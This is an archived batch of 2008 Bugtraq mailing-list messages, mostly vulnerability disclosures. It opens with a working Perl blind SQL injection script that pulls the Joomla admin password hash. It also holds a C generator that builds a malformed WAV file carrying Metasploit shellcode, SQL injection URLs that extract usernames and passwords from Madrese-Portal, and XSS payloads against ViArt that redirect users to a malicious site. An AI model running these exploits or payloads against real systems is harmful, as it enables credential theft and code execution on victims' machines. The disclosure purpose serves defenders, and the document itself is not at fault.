use LWP::UserAgent;

if (@ARGV != 1){
header();
exit();
}

$host = $ARGV[0];


print "\n md5 Password:\r\n";
&halghe();
print "\n[+]Done\n";


sub halghe {
for($i = 1; $i <= 32; $i++){
 $f = 0;
 $n = 48;
 while(!$f && $n <= 57)
 {
  if(&inject($host, $i, $n,)){
 $f = 1;
     syswrite(STDOUT, chr($n), 1);
   }
$n++;
}
if(!$f){ 
$n;
while(!$f && $n <= 102)
 {
  if(&inject($host, $i, $n,)){
 $f = 1;
     syswrite(STDOUT, chr($n), 1);
   }
$n++;
}}
}
}
sub inject {
my $site = $_[0];
my $a = $_[1];
my $b = $_[2];



$col = "password";

$attack= "$site"."?option=com_mdigg&act=story_lists&task=view&category=2/**/and/**/substring((select/**/"."$col"."/**/from/**/jos_users/**/where/**/username/**/like/**/0x61646d696e25/**/limit/**/0,1),"."$a".",1)=char("."$b".")/*";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$attack));
$res = $req->content;

if ($res =~ /read more/i){
    return 1;
}

}
sub header {
print qq{
######################################################################################
# Joomla Component mdigg 2.2.8 Blind SQL Injection Exploit                           #
#                        www.virangar.net                                            #
#                                                                                    #
#   Useage: perl $0 Host                                                             #
#                                                                                    #
#   Host: full patch to index.php (dont forget http://)                              #
#                                                                                    #
#                                                                                    #
# useage Example: perl $0 http://demo15.joomlaapps.com/index.php                     #
#                                                                                    #
######################################################################################
};
}

From - Mon Dec 29 13:00:38 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005514
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39035-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id BABB2EC0B4
for <lists@securityspace.com>; Mon, 29 Dec 2008 12:53:39 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id B310E1437C6; Mon, 29 Dec 2008 10:43:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17829 invoked from network); 27 Dec 2008 09:32:06 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <fw@deneb.enyo.de>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR SBL_XBL_SPAMHAUS=ERR NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client!2.9.189.167> <helo=mail.enyo.de> <from=fw@deneb.enyo.de> <tobian-security-announce@lists.debian.org>, rate: -4.6
From: Steffen Joeris <white@debian.org>
Date: Sat, 27 Dec 2008 10:49:06 +0100
Message-ID: <87r63uj6ct.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-8.68 tagged_above=3.6 required=5.3
tests=[FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_2=1, LDO_WHITELIST=-5,
MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1692-1] New php-xajax packages fix cross-site scripting
Priority: urgent
Resent-Message-ID: <-txhT8HFCuB.A.jKG.hrfVJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Sat, 27 Dec 2008 09:52:33 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1692-1                  security@debian.org
http://www.debian.org/security/                           Steffen Joeris
December 27, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : php-xajax
Vulnerability  : insufficient input sanitising
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-2739

It was discovered that php-xajax, a library to develop Ajax
applications, did not sufficiently sanitise URLs, which allows attackers
to perform cross-site scripting attacks by using malicious URLs.

For the stable distribution (etch) this problem has been fixed in
version 0.2.4-2+etch1.

For the testing (lenny) and unstable (sid) distributions this problem
has been fixed in version 0.2.5-1.

We recommend that you upgrade your php-xajax package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/p/php-xajax/php-xajax_0.2.4-2+etch1.dsc
    Size/MD5 checksum:      648 f4bbc450f631e1a000679690858997ff
  http://security.debian.org/pool/updates/main/p/php-xajax/php-xajax_0.2.4-2+etch1.diff.gz
    Size/MD5 checksum:     3441 37934d6df03bca92b0ee2d029b46faa4
  http://security.debian.org/pool/updates/main/p/php-xajax/php-xajax_0.2.4.orig.tar.gz
    Size/MD5 checksum:    48261 58229c55be17c681a22699b564e6be26

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/php-xajax/php-xajax_0.2.4-2+etch1_all.deb
    Size/MD5 checksum:    44770 152e977b65bc603155947edf9738ab31


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJVflRAAoJEL97/wQC1SS+hcIH/0kGCBer0lWzivFYSjuomfpe
vS3FmudLu7K4wf2HMhQkBYV9krH2S6Jyki16k6hmerh5cDDOlrZxKuLFkqUfPBIr
Xd2XQC51gP7+/l6W3jEdsndiqPFx5uJhklzUddKrg665EqyDXxG2GIDwvJ67P7YG
+GY2ngEEIkGnr9akEPVWXIUS2NTMm45RpS0l1ZjK7tuSNWwLYg66JLKhXcwV7THJ
DUMex6/6HlZdXgezxpbM3hDwc6sa9bK+/LBIcgcxbLcdbV8ODGCvH+Z0OmYtEsov
4/TGaNlI+OgdoCtC2t9+6HeA31SYyaxN79qhM8B7W5OI5gN+xGxjkAKsb29jA70=xPXX
-----END PGP SIGNATURE-----

From - Mon Dec 29 13:00:38 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005515
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39037-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 7F2AAEC0B5
for <lists@securityspace.com>; Mon, 29 Dec 2008 12:59:30 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 59A151437E5; Mon, 29 Dec 2008 10:54:47 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 13657 invoked from network); 28 Dec 2008 04:29:25 -0000
Date: Sat, 27 Dec 2008 21:34:51 -0700
Message-Id: <200812280434.mBS4YpnK012006@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: anonymous@anonym.an
To: bugtraq@securityfocus.com
Subject: hm? new vulnerabilities? wav windows media
Status:   

#include <stdio.h>

int main()
{
/* win32_exec -  EXITFUNC=process CMDlc.exe Size8 Encoder=None http://metasploit.com */
unsigned char scode[] "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99"
"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04"
"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb"
"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30"
"\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09"
"\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8"
"\x83\xc0\x7b\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff"
"\xe7\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

unsigned char begincode[] "\x52\x49\x46\x46\x04\x44\x0E\x01\x57\x41\x56\x45\x66\x6D\x74\x20"
"\x28\x00\x00\x00\xFE\xFF\x02\x00\x00\xEE\x02\x00\x00\x94\x11\x00"
"\x06\x00\x18\x00\x16\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x10\x00\x80\x00\x00\xAA\x00\x38\x9B\x71\x64\x61\x74\x61"
"\xC8\x43\x0E\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00";

    FILE *f;
    f = _fsopen("new.wav", "w+", 0);
    fwrite(begincode, sizeof(scode), 1, f);
    for (int i=0; i<20000; i++)
         fwrite(scode, sizeof(scode), 1, f);
    fclose(f);
    return 0;
}

From - Mon Dec 29 13:20:37 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005516
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39040-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id BB6CCEC0B4
for <lists@securityspace.com>; Mon, 29 Dec 2008 13:12:39 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 9F3AC143898; Mon, 29 Dec 2008 10:59:10 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10178 invoked from network); 29 Dec 2008 13:35:28 -0000
Message-ID: <4958D6C2.6040300@libero.it>
Date: Mon, 29 Dec 2008 14:55:14 +0100
From: Carmelo Brancato <carmelobrancato@libero.it>
User-Agent: Thunderbird 2.0.0.18 (X11/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: MSN messenger sends IP addresses Public and Private
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Status:   

MSN Messenger bug

Release Date:

10/12/2008


Versions Affected:

Msn messenger 8.5.1
-------------------------------
Description :

The protocol MSNP15 Windows Live Messenger Client 8.5.1 transmit to the
information on the IP address public and private. Everything happens
during a conversation that starts with you in our contacts list.

By analyzing the conversation with Wireshark can be noted that in
addition to passing the information, such as the sessionid, the Cal, the
Ringing, and also pass Ipv4ExternalAddrsAndPorts
Ipv4InternalAddrsAndPorts. Ipv4ExternalAddrsAndPorts indicates the
public IP address with its front door, Ipv4InternaladdrsAndPorts
indicates the private IP address and port logic of our interlocutor.
This happens because the server fails to properly manage the various NAT
Client. That is, the server should send its IP to another client and not
the client you are talking.

Here is a portion of the frame concerned:

MSNMSGR:aaaa@hotmail.it MSNSLP/1.0
To: <msnmsgr:aaaa@hotmail.it>
From: <msnmsgr:bbbbbb@hotmail.it>
Via: MSNSLP/1.0/TLP ;branch={D4CE435D-8C31-4D80-80EC-576A8294B3B3}
CSeq: 0
Call-ID: {00000000-0000-0000-0000-000000000000}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-transudpswitch
Content-Length: 157

IPv4ExternalAddrsAndPorts: 79.2.165.233:3939
IPv4InternalAddrsAndPorts: 192.168.0.2:3939
SessionID: 729003413
SChannelState: 0
Capabilities-Flags: 1

We can also note the whole party in the case where Bridge conduct a
summary of the fields of our interlocutor.
This is the second part of the frame concerned:
Bridge: TCPv1
Listening: true
Conn-Type: Port-Restrict-NAT
TCP-Conn-Type: Port-Restrict-NAT
Nonce: {2DA8E1E7-CD08-4200-8E62-C2263EAC2D36}
IPv4External-Addrs: 79.2.165.233
IPv4External-Port: 3973
IPv4Internal-Addrs: 192.168.0.2
IPv4Internal-Port: 3973
SessionID: 275007100
SChannelState: 0
Capabilities-Flags: 1


Here is the full frame of the conversation:

MSNMSGR:aaaa@hotmail.it MSNSLP/1.0
To: <msnmsgr:aaaa@hotmail.it>
From: <msnmsgr:bbbbbb@hotmail.it>
Via: MSNSLP/1.0/TLP ;branch={D4CE435D-8C31-4D80-80EC-576A8294B3B3}
CSeq: 0
Call-ID: {00000000-0000-0000-0000-000000000000}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-transudpswitch
Content-Length: 157

IPv4ExternalAddrsAndPorts: 79.2.165.233:3939
IPv4InternalAddrsAndPorts: 192.168.0.2:3939
SessionID: 729003413
SChannelState: 0
Capabilities-Flags: 1

######A#########g#######g#######¶8»#############INVITE
MSNMSGR:aaa@hotmail.it MSNSLP/1.0
To: <msnmsgr:aaaa@hotmail.it>
From: <msnmsgr:bbbb@hotmail.it>
Via: MSNSLP/1.0/TLP ;branch={31DB585D-3119-40AF-B02B-3D9BAEF32CD0}
CSeq: 0
Call-ID: {9A68685A-1FCF-86A1-B639-BA769BA9B514}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-transreqbody
Content-Length: 270

Bridges: TRUDPv1 TCPv1 SBBridge TURNv1
NetID: -375061937
Conn-Type: Port-Restrict-NAT
TCP-Conn-Type: Port-Restrict-NAT
UPnPNat: true
ICF: false
Hashed-Nonce: {D8F5EEB9-2568-FAE8-9460-3FF8DB908381}
SessionID: 275007100
SChannelState: 0
Capabilities-Flags: 1

#####MSG 49 D 155
MIME-Version: 1.0
Content-Type: application/x-msnmsgrp2p
P2P-Dest: bbbb@hotmail.it

####_áEu########g#################A#¶8»#g###########ACK 49
MSG 50 D 555
MIME-Version: 1.0
Content-Type: application/x-msnmsgrp2p
P2P-Dest: bbbb@hotmail.it

####^áEu######################ÔùH(############MSNSLP/1.0 200 OK
To: <msnmsgr:bbbbb@hotmail.it>
From: <msnmsgr:aaaa@hotmail.it>
Via: MSNSLP/1.0/TLP ;branch={31DB585D-3119-40AF-B02B-3D9BAEF32CD0}
CSeq: 1
Call-ID: {9A68685A-1FCF-86A1-B639-BA769BA9B514}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-transrespbody
Content-Length: 83

Bridge: TCPv1
Listening: false
Nonce: {00000000-0000-0000-0000-000000000000}

#####ACK 50
MSG bbbb@hotmail.it [c(][i]BBBB[/i][/c] 143
MIME-Version: 1.0
Content-Type: application/x-msnmsgrp2p
P2P-Dest: aaa@hotmail.it

######A#########################^áEuÔùH(###########MSG bbbb@hotmail.it
[c(][i]BBB[/i][/c] 815
MIME-Version: 1.0
Content-Type: application/x-msnmsgrp2p
P2P-Dest: aaaa@hotmail.it

######A######### ####### #######àe»#############INVITE
MSNMSGR:aaaa@hotmail.it MSNSLP/1.0
To: <msnmsgr:aaa@hotmail.it>
From: <msnmsgr:bbbb@hotmail.it>
Via: MSNSLP/1.0/TLP ;branch={5BDF5F91-90FF-4C0F-ACA6-F65A9E30986C}
CSeq: 0
Call-ID: {9A68685A-1FCF-86A1-B639-BA769BA9B514}
Max-Forwards: 0
Content-Type: application/x-msnmsgr-transrespbody
Content-Length: 326

Bridge: TCPv1
Listening: true
Conn-Type: Port-Restrict-NAT
TCP-Conn-Type: Port-Restrict-NAT
Nonce: {2DA8E1E7-CD08-4200-8E62-C2263EAC2D36}
IPv4External-Addrs: 79.2.165.233
IPv4External-Port: 3973
IPv4Internal-Addrs: 192.168.0.2
IPv4Internal-Port: 3973
SessionID: 275007100
SChannelState: 0
Capabilities-Flags: 1
An attacker could have free access to the router or network situations
and commit illegal actions or damage other networks.

------------------------------------
Possible fix/workaround :
This bug could be resolved in Sever which operates the Nat Protocol
MSNP15 and possibly creating a new protocol that does not create
problems of this kind.


--------------------------------------
This bug was discovered using the software installed in Pidgin 2.2.0
Linux distribution Slackware 12.0, during the various conversations with
users who use Windows Live Messenger 8.1 and 8.5.

Please send suggestions or comments to:

carmelobrancato@libero.it

From - Mon Dec 29 13:20:38 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005517
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39039-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id A7CB1EC0B4
for <lists@securityspace.com>; Mon, 29 Dec 2008 13:18:01 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 55C11143872; Mon, 29 Dec 2008 10:58:20 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3323 invoked from network); 29 Dec 2008 05:37:16 -0000
Date: 29 Dec 2008 05:58:07 -0000
Message-ID: <20081229055807.3318.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: XiaShing@gmail.com
To: bugtraq@securityfocus.com
Subject: ViArt Shopping Cart v3.5 Multiple Remote Vulnerabilities
Status:   

==============================================================!vuln
ViArt Shopping Cart v3.5 is prone to multiple remote 
vulnerabilities. Earlier versions may also be affected.
==============================================================
==============================================================!dork
Dork: intext:"Free Ecommerce Shopping Cart Software by ViArt" +"Your shopping cart is empty!" + "Products  Search" +"Advanced Search" + "All Categories"
==============================================================
==============================================================!risk 1 - Full Path Disclosure
Low
Attackers can use this vulnerability to leverage another attack
after the full path has been disclosed.
==============================================================
==============================================================!discussion 1 - Full Path Disclosure
The server will give an error when any URL real/imaginary is 
passed to the POST_DATA parameter:
http://www.victim.com/manuals_search.php?POST_DATA=http://site-that-does-not-exist.com

A remote user is able to identify the full path of the document
root folder.
==============================================================
==============================================================!risk 2 - Information Disclosure
Medium
The table names can be further leveraged for a SQL injection if
one exists.
==============================================================
==============================================================!discussion 2 - Information Disclosure
When a user is not signed in, the tables are shown to the 
attacker via an error, because the PHP form fails to properly
sanitize user_id since the user is not logged in.

The attacker must first try to add a product to the cart and 
then save the shopping cart for the tables to be revealed by 
browsing to: http://www.victim.com/cart_save.php
==============================================================
==============================================================!risk 3 - Arbitrary Code Injection
High
Attackers can use this vulnerability to execute arbitrary code
on a legitimate user.
==============================================================
==============================================================!discussion 3 - Arbitrary Code Injection
The attacker is able to create shopping carts with 
HTML/Javascript injected code such as:
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><a href="http://www.google.com">Google</a></html>
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>alert("VULN");</script></html>
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>window.location="http://malicious-site.com";</script></html>

Then when the user visits "My Saved Carts" at 
http://victim.com/user_carts.php the code is executed:
Example 1 would give a link to the Google search engine.
Example 2 would give a javascript alert popup displaying "VULN".
Example 3 would send the user to a malicious site.

Note: manuals_search.php is also vulnerable to the same 
HTML/Javascript vulnerability that allows for arbitrary code to
be executed:
http://www.victim.com/manuals_search.php?manuals_search=<html><script>window.location="http://malicious-site.com";</script></html>

A remote user is able to identify the full path of the document
root folder.
==============================================================
==============================================================!extras
The Cart name is all that needs to be guessed/brute-forced for 
an attacker to gain entry to the shopping cart. As the cart-id 
increments from 1 upwards. This does not require any user-login
from the attacker.

An attacker could also overload the server with a ton of 
shopping carts by constantly refreshing cart_save.php to create
multiple shopping cart ID's.
==============================================================
==============================================================!solution
ViArt Shopping Cart can still be used, but be wary of the full 
path disclosure and make sure no SQL injections can take place
once an attacker knows the table names. Alert users that they 
should be wary of which links they click on as an attacker 
could redirect them to a malicious site. The overloading of 
cart_save.php can be solved by placing IP-bans on attackers.
There is no solution to the brute-force guessing of cart names.
The vendor has not yet been notified.
==============================================================
==============================================================!greetz
Greetz go out to the people who know me.
==============================================================
==============================================================!author
Xia Shing Zee
==============================================================
From - Mon Dec 29 13:30:38 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005518
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39042-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 7B1A7EC0B4
for <lists@securityspace.com>; Mon, 29 Dec 2008 13:27:26 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 601841438B3; Mon, 29 Dec 2008 10:59:48 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20470 invoked from network); 25 Dec 2008 20:16:44 -0000
Date: Thu, 25 Dec 2008 13:22:03 -0700
Message-Id: <200812252022.mBPKM3Q7003412@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: r3d.w0rm@yahoo.com
To: bugtraq@securityfocus.com
Subject: Madrese-Portal Sql Injection
Status:   

#####################################################################################
####                      Madrese-Portal Sql Injection                         ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
#                                                                                   #
#Download : http://dl.p30vel.ir/scripts/Madrese-Portal-Asp-Eh3an.p-(www.p30vel.ir).rar
#                                                                                   #
#Dork : "Design By ASD Tasarim"                                                     #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#Username : http://Site/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1
#                                                                                   #
#Password : http://Site/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

From - Mon Dec 29 13:40:38 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005519
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39038-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 99823EC0B4
for <lists@securityspace.com>; Mon, 29 Dec 2008 13:39:42 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 0ECB2143817; Mon, 29 Dec 2008 10:57:54 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28828 invoked from network); 28 Dec 2008 22:30:09 -0000
Date: 28 Dec 2008 22:50:56 -0000
Message-ID: <20081228225056.3869.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: admin@elites0ft.com
To: bugtraq@securityfocus.com
Subject: MagpieRSS XSS 0day
Status:   

Hello,

I have found a Cross Site Scripting vulnerability in MagpieRSS, an RSS parser written in PHP, basically, this piece of software enables users to add their own RSS feeds to be parsed, so they can keep up to date with their favourite feeds, as well as the pre-defined ones.

I crafted my own RSS feed, which contains XSS inside the CDATA.

Here is the XML file I used: http://www.elites0ft.com/poc.xml

If for example, I ask a user to subscribe to my feed, after disguising it as a real feed, I then go and update it with malicious content, the RSS parser will then parse the updated content and the user will end up loading an Iframe with a cookie stealer inside.

The reason this happens is because the CDATA is not getting escaped, it is a simple fix: htmlentities() around the parsed CDATA.

This is a potentially harmful exploit if you can convince users to add your feed.

Thanks for reading,
system_meltdown.
[Elites0ft.com]

From - Mon Dec 29 14:10:37 2008
X-Account-Key: account7
X-UIDL: 4909bb8c0000551b
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39041-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 4EB8CEC0B3
for <lists@securityspace.com>; Mon, 29 Dec 2008 14:01:58 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
